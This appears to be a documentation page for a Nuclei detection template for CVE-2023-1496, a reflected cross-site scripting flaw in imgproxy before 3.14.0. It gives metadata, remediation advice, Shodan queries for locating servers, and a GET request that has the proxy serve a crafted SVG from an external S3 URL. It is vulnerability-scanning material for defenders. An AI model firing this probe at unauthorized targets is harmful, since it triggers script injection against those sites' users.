Imgproxy < 3.14.0 - Cross-site Scripting (XSS)
ID: CVE-2023-1496
Severity: medium
Author: pdteam
Tags: cve,cve2023,huntr,imgproxy,xss,svg,evilmartians
Description
Section titled “Description”Cross-site Scripting (XSS) - Reflected in GitHub repository imgproxy/imgproxy prior to 3.14.0.
YAML Source
Section titled “YAML Source”id: CVE-2023-1496
info: name: Imgproxy < 3.14.0 - Cross-site Scripting (XSS) author: pdteam severity: medium description: Cross-site Scripting (XSS) - Reflected in GitHub repository imgproxy/imgproxy prior to 3.14.0. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions. remediation: | Upgrade to Imgproxy version 3.14.0 or later to mitigate this vulnerability. reference: - https://github.com/imgproxy/imgproxy/commit/62f8d08a93d301285dcd1dabcc7ba10c6c65b689 - https://huntr.dev/bounties/de603972-935a-401a-96fb-17ddadd282b2 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2023-1496 cwe-id: CWE-79 epss-score: 0.00091 epss-percentile: 0.39059 cpe: cpe:2.3:a:evilmartians:imgproxy:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: evilmartians product: imgproxy shodan-query: - "Server: imgproxy" - "server: imgproxy" tags: cve,cve2023,huntr,imgproxy,xss,svg,evilmartians
http: - method: GET path: - "{{BaseURL}}/unsafe/plain/https://cve-2023-1496.s3.amazonaws.com/imgproxy_xss.svg"
matchers: - type: dsl dsl: - contains(body, 'PC9zdmc+#test') - status_code == 200 condition: and
extractors: - type: dsl dsl: - content_security_policy# digest: 490a00463044022060c02b78e8ef9b1252d466627275d2b82c13d8df00666244510f16226bc603ad0220243087ecedc5c516b3b6216d27b139d4341a74c73641152e3dd56726618323a5:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-1496.yaml"